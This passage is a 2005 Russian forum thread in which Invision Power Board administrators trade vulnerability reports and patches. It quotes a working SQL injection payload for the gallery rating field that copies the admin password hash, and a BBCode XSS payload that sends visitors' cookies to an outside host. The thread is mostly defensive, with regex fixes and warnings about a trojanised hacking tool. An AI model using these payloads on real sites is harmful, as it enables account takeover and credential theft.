kolorom Опубликовано 20 Июня 2005 Жалоба Поделиться Опубликовано 20 Июня 2005 В инвижне есть распространённый мод - галерея фоток, так вот в ней я обнаружил такую инъекцию: при голосовании за фотку не фильтруется значение оценки. она подставляется в такой запрос-Код: UPDATE ibf_gallery_images SET ratings_total=ratings_total+$rating, ratings_count=ratings_count+1 WHERE id=266 здесь переменная $rating - это оценка, а id - номер картинки (он нам не пригодится) Вот. но что же можно сделать с запросом UPDATE?В мискле начиная с версии 4.1 поддерживается подвыборка (sub select). то есть если мы подставим вместо оценки такой текст:1, name=(select password from ibf_members where id=1)то получится такой запрос: Код: UPDATE ibf_gallery_images SET ratings_total=ratings_total+1, name=(select password from ibf_members where id=1), ratings_count=ratings_count+1 WHERE id=266 ну это я для примера... вот так можно записать в название картинки хэш пароля юзера. ©coyl Вот кстати заметил без автора идеи что приходят письма о ошибках мускула такого рода все связанно с оценками!!! Database error in: mySQL query error: UPDATE ibf_files SET votes = 10, total = 41 , rating = 4,1 WHERE id = '5' mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 WHERE id = '5'' at line 1 mySQL error number: 1064 Script URI: /forum/index.php?act=Downloads&do=rating&id=5&rate=5 Это происходит как и в галерее так и в модуле файлов 8( Что делать Ссылка на комментарий Поделиться на других сайтах Прочее
dfc_darkman Опубликовано 20 Июня 2005 Жалоба Поделиться Опубликовано 20 Июня 2005 дыкэто запрос напрямую к базе?или через ссылку можно тако сделать? Ссылка на комментарий Поделиться на других сайтах Прочее
X@MиЛь Опубликовано 27 Июня 2005 Жалоба Поделиться Опубликовано 27 Июня 2005 мне сложно шас что то говорить. форум мой сломан. но я должен всех предостиреч от такойже проблемы. хакер написал как он сломал и как исправить дырку. делюс с вами друзья : в sources/Login.php Код $pid = $std->my_getcookie(pass_hash); меняем на $pid = (!preg_match(/^([0-9A-Za-z]){32}$/, $std->my_getcookie(pass_hash)))?$std->my_getcookie(pass_hash):""; Ссылка на комментарий Поделиться на других сайтах Прочее
nafigator Опубликовано 27 Июня 2005 Жалоба Поделиться Опубликовано 27 Июня 2005 Описание уязвимости и её решение было в этой теме.Уязвимости форумов Invision Power Board Ссылка на комментарий Поделиться на других сайтах Прочее
Anna Опубликовано 28 Июня 2005 Жалоба Поделиться Опубликовано 28 Июня 2005 Дык написали же, что нет там восклицательного знака: Verify мин нет в sources/Login.php $pid = $std->my_getcookie('pass_hash'); меняем на $pid = (preg_match('/^([0-9A-Za-z]){32}$/', $std->my_getcookie('pass_hash')))?$std->my_getcookie('pass_hash'):"";<{POST_SNAPBACK}> правильно ?а вот это $pid = (!preg_match(/^([0-9A-Za-z]){32}$/, $std->my_getcookie(pass_hash)))?$std->my_getcookie(pass_hash):""; НЕ ПРАВИЛЬНО? я правильно понимаю? Ссылка на комментарий Поделиться на других сайтах Прочее
Song Опубликовано 28 Июня 2005 Жалоба Поделиться Опубликовано 28 Июня 2005 Воск. знак не нужен. Ссылка на комментарий Поделиться на других сайтах Прочее
Anna Опубликовано 29 Июня 2005 Жалоба Поделиться Опубликовано 29 Июня 2005 (изменено) А вот по этому поводу идеи есть:Возможная дырка в безопасности ???? Изменено 29 Июня 2005 пользователем Anna Ссылка на комментарий Поделиться на других сайтах Прочее
seba Опубликовано 4 Июля 2005 Жалоба Поделиться Опубликовано 4 Июля 2005 пришла вот такая рекламка на мыло: IPB Toolbox <ipbtoolbox@gmail.com> Dear User, I've finally decided to release my IPB Toolbox. With this program you can flood IPB boards in just a few clicks. It has several advanced features thatmake it hard to detect and trace. It even works on most modded boards. Here's its feature list: -Mass user registration-Mass posting-Arcade cheater-Lots more Link :_http://www.ххх.org/ipbtoolbox/ Disclaimer:This program was created for educational purposes only. The author is in no way responsible for what you chose to do with this program, or any damagethat you or this program causes. Sincerely,The IPB Toolbox Team с ее помощью делают SQL-инъекции. форум 2.0.4, все обновления из этой темы ставил, и все равно смогли взломать.адресс сайта могу дать, откуда можно качнуть эту утилю. Ссылка на комментарий Поделиться на других сайтах Прочее
Anna Опубликовано 4 Июля 2005 Жалоба Поделиться Опубликовано 4 Июля 2005 Я нашла в инете заметку, где написано НИ В КОЕМ СЛУЧАЕ не скачивать и не пробовать эту прогу на своем форуме, потому что эта прога отсылает какие-то данные своему разработчку о вашем форуме и о том как именно вы ее тестили.[1120477603:1120498361]Файло не качайте плз - там троян. Проверила касперским. Ссылка на комментарий Поделиться на других сайтах Прочее
Onic Опубликовано 8 Июля 2005 Жалоба Поделиться Опубликовано 8 Июля 2005 (изменено) я вот это на форум слал у меня получилось на ипб 2.0<{POST_SNAPBACK}>тоже попробовал. но как увидеть получилось или нет?все ссылки в БД по слову antichat вычистил на всякий случай.Подскажите как определить способ по которому меня взломали, что бы обезопасить тебя. Версия IPB 2.0.3. а днях появился новый пользователь с логином tugr|k, именно с символом "|". Он не сделал на форуме ниодной записи от себя, а лишь проголосовал в опросе (при создании опроса картинки не использовались, опция отключена).А потом он начали писать из под логина админа. Когда я забанил логин tugr|k - это не помогло.Угрожает что сможет уничтожыть форум и сайт.в базе mySQL в его данных есть подозрительное отличие: в таблице ibf_members в поле org_perm_id стояла цифра 5, которую я только что удалил. Изменено 9 Июля 2005 пользователем Onic Ссылка на комментарий Поделиться на других сайтах Прочее
ghost46 Опубликовано 9 Июля 2005 Жалоба Поделиться Опубликовано 9 Июля 2005 а что с этим то делать: http://antichat.ru/txt/utf7/я 17 страниц перечитал и не нашел ответа блин(( Ссылка на комментарий Поделиться на других сайтах Прочее
SAT Опубликовано 9 Июля 2005 Жалоба Поделиться Опубликовано 9 Июля 2005 [COLOR=[IMG=http://aaa.aa/=`aaa.jpg]]` style=background:url(javascript:document.images[68].src="http://site.ru/s.jpg?"+document.cookie) [/COLOR] а я давно убил возможность подставлять любое кроме латинских букв while( preg_match( "#\[color=([a-zA-Z]+)\](.+?)\[/color\]#is", $txt ) ) { $txt = preg_replace( "#\[color=([a-zA-Z]+)\](.+?)\[/color\]#ies" , "\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt ); } Onic, поставь для спокоствия что ты завтра останешься админом http://www.ibresource.ru/db/435/ Ссылка на комментарий Поделиться на других сайтах Прочее
Monah Опубликовано 9 Июля 2005 Жалоба Поделиться Опубликовано 9 Июля 2005 -SAT-А в какой файл записывать и вместо чего, чтобы только "латинские" регились?:7: sebaAnnaПохищает файлы, содержащие настройки ниже перечисленных программ и сервисов:* &RQ(IRQ)* Becky! Internet Mail* Cute FTP* EDialer* FAR (ftp plugin info)* Microsoft Outlook* Mirabilis ICQ* Miranda ICQ* Mozilla* Opera* The Bat!* Total Commander* Trillian Messenger* WS_FTP* Информация RAS службы Windows Хороший атнивирь скачать файл не даст. Ссылка на комментарий Поделиться на других сайтах Прочее
Anna Опубликовано 10 Июля 2005 Жалоба Поделиться Опубликовано 10 Июля 2005 Да при чем тут антивирь? Эта прога - чистый развод для лохов, которые считают себя мега-хакерами, но сами ничего не пишут. Ссылка на комментарий Поделиться на других сайтах Прочее
SAT Опубликовано 10 Июля 2005 Жалоба Поделиться Опубликовано 10 Июля 2005 конечно же в post_paster.php while ( preg_match( "#\[size=([^\]]+)\](.+?)\[/size\]#ies", $txt ) ) { $txt = preg_replace( "#\[size=([^\]]+)\](.+?)\[/size\]#ies" , "\$this->regex_font_attr(array('s'=>'size','1'=>'\\1','2'=>'\\2'))", $txt ); } while ( preg_match( "#\[font=([^\]]+)\](.*?)\[/font\]#ies", $txt ) ) { $txt = preg_replace( "#\[font=([^\]]+)\](.*?)\[/font\]#ies" , "\$this->regex_font_attr(array('s'=>'font','1'=>'\\1','2'=>'\\2'))", $txt ); } while( preg_match( "#\[color=([^\]]+)\](.+?)\[/color\]#ies", $txt ) ) { $txt = preg_replace( "#\[color=([^\]]+)\](.+?)\[/color\]#ies" , "\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt ); } заменить на while ( preg_match( "#\[size=([0-9]+)\](.+?)\[/size\]#is", $txt ) ) { $txt = preg_replace( "#\[size=([0-9]+)\](.+?)\[/size\]#ies" , "\$this->regex_font_attr(array('s'=>'size','1'=>'\\1','2'=>'\\2'))", $txt ); } while ( preg_match( "#\[font=([a-zA-Z]+)\](.*?)\[/font\]#is", $txt ) ) { $txt = preg_replace( "#\[font=([a-zA-Z]+)\](.*?)\[/font\]#ies" , "\$this->regex_font_attr(array('s'=>'font','1'=>'\\1','2'=>'\\2'))", $txt ); } while( preg_match( "#\[color=([a-zA-Z]+)\](.+?)\[/color\]#is", $txt ) ) { $txt = preg_replace( "#\[color=([a-zA-Z]+)\](.+?)\[/color\]#ies" , "\$this->regex_font_attr(array('s'=>'col' ,'1'=>'\\1','2'=>'\\2'))", $txt ); } хотя можно и разрешить пользователям цвета вводить таким макаром #ff0000 тогда думаю что стоит в font и color заменить [a-zA-Z] на [a-zA-Z0-9\#] у меня юзеры ругались пришлось вот так сделать, но все равно опаска что возможны подводные камни, хотя текст который может содержать уязвимость и состоять из латиници, цифр и # не могу придумать[1120984561:1120984961]ЗЫ: WS_FTP Server дырявый как не знаю что... локальный пользователь может эксплотировать backdoor с помощью которого заставить выполнить локальное приложение с привилегиями системного процесса.... Да при чем тут антивирь? Эта прога - чистый развод для лохов, которые считают себя мега-хакерами, но сами ничего не пишут. пожалуй правильное решение, просто не поддоваться на уловки мошенников и все... Ссылка на комментарий Поделиться на других сайтах Прочее
ghost46 Опубликовано 10 Июля 2005 Жалоба Поделиться Опубликовано 10 Июля 2005 а что с этим то делать: http://antichat.ru/txt/utf7/я 17 страниц перечитал и не нашел ответа блин((<{POST_SNAPBACK}>не мож кто напишет конкретно че с этим делать - я уже и поиск юзал и писал, а меня игнорят... Ссылка на комментарий Поделиться на других сайтах Прочее
Spear Опубликовано 10 Июля 2005 Жалоба Поделиться Опубликовано 10 Июля 2005 не мож кто напишет конкретно че с этим делать - я уже и поиск юзал и писал, а меня игнорят...<{POST_SNAPBACK}>извини, конечно.. но ты глупый что-ли?во-первых в условиях тестирования в ИПБ 1.3 эта бага не даёт ничего.во-вторых (текст со статьи античата):Как видим, в странице указан метатег с кодировкой ISO-8859-1, что однозначно определяет кодировку страницы. Однако обратим внимание на то, что тег <title>, куда заносится тема текущего топика, находится перед метатегом (отмечено желтым). А это значит, учитывая описанные особенности парсинга, что если в тег title будет внедрен скрипт в кодировке UTF-7, то он будет раскодирован и выполнен. Таким образом, для проведения XSS атаки, достаточно создать в форуме тему, название которой будет зашифровано в кодировке UTF-7 и содержать вредоносный скрипт.если до сих пор не дошло - обьясню. НУЖНО ОТРЕДАКТИРОВАТЬ ШАБЛОНЫ И ВЫНЕСТИ ТЕГ <TITLE> НИЖЕ МЕТАТЕГА ОПРЕДЕЛЯЮЩЕГО КОДИРОВКУ. сделать это очень "тяжело", именно поэтому тебе никто и не отвечал. Ссылка на комментарий Поделиться на других сайтах Прочее
ghost46 Опубликовано 10 Июля 2005 Жалоба Поделиться Опубликовано 10 Июля 2005 извини что задел тебя своим вопросом... Ссылка на комментарий Поделиться на других сайтах Прочее
Spear Опубликовано 10 Июля 2005 Жалоба Поделиться Опубликовано 10 Июля 2005 извини что задел тебя своим вопросом...<{POST_SNAPBACK}>своим вопросом ты меня ничуть не задел. По твоему троеточию в конце поста могу подумать что я задел тебя своим ответом. Не плачь. Ссылка на комментарий Поделиться на других сайтах Прочее
Onic Опубликовано 11 Июля 2005 Жалоба Поделиться Опубликовано 11 Июля 2005 Подскажите как определить способ по которому меня взломали, что бы обезопасить тебя. Версия IPB 2.0.3. а днях появился новый пользователь с логином tugr|k, именно с символом "|". Он не сделал на форуме ниодной записи от себя, а лишь проголосовал в опросе (при создании опроса картинки не использовались, опция отключена).А потом он начали писать из под логина админа. Когда я забанил логин tugr|k - это не помогло.Угрожает что сможет уничтожыть форум и сайт.в базе mySQL в его данных есть подозрительное отличие: в таблице ibf_members в поле org_perm_id стояла цифра 5, которую я только что удалил. Сорри, что повторяюсь! Ссылка на комментарий Поделиться на других сайтах Прочее
-winux- Опубликовано 11 Июля 2005 Жалоба Поделиться Опубликовано 11 Июля 2005 Юзер этот может оказаться не при чем. Если форум 2.0.3. то скорее тебя поимели сплойтом от RST. Там просто SQL инъекция, выдающая хэш админа, который потом можно подставить в куки. Если хочешь - стучи в асю, помогу закрыть: 11177222 Ссылка на комментарий Поделиться на других сайтах Прочее
Dekker Опубликовано 11 Июля 2005 Жалоба Поделиться Опубликовано 11 Июля 2005 нафига куда-то стучаться, если уязвимость фиксили здесь Уязвимости форумов Invision Power Board умным хотца быть, да ? Ссылка на комментарий Поделиться на других сайтах Прочее
X@MиЛь Опубликовано 12 Июля 2005 Жалоба Поделиться Опубликовано 12 Июля 2005 Люди тут куча нововведений. Даже не всё понятно. Стока дырок и их исправлений. Я тут подумал а почему бы IBResource не выпускать патч безопасности включающий в себя все эти заплатки. Это было бы просто супер! А так все 18 страниц нужно изучать и убивать целые дни что бы заделать все эти дырки Ссылка на комментарий Поделиться на других сайтах Прочее
Armad Опубликовано 12 Июля 2005 Жалоба Поделиться Опубликовано 12 Июля 2005 Ко мне в ркуи попал немного доработаный сплоит от рст, который позволяет получать хэш во всех версиях ипб, ВКЛЮЧАЯ 2.0.4. Сплоит в паблик выкладывать небуду, если кто-то из админов заинтересуется вышлю на мыло/аську/лс код для изучения. Ссылка на комментарий Поделиться на других сайтах Прочее
GiV Опубликовано 12 Июля 2005 Жалоба Поделиться Опубликовано 12 Июля 2005 Armad кидай... Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения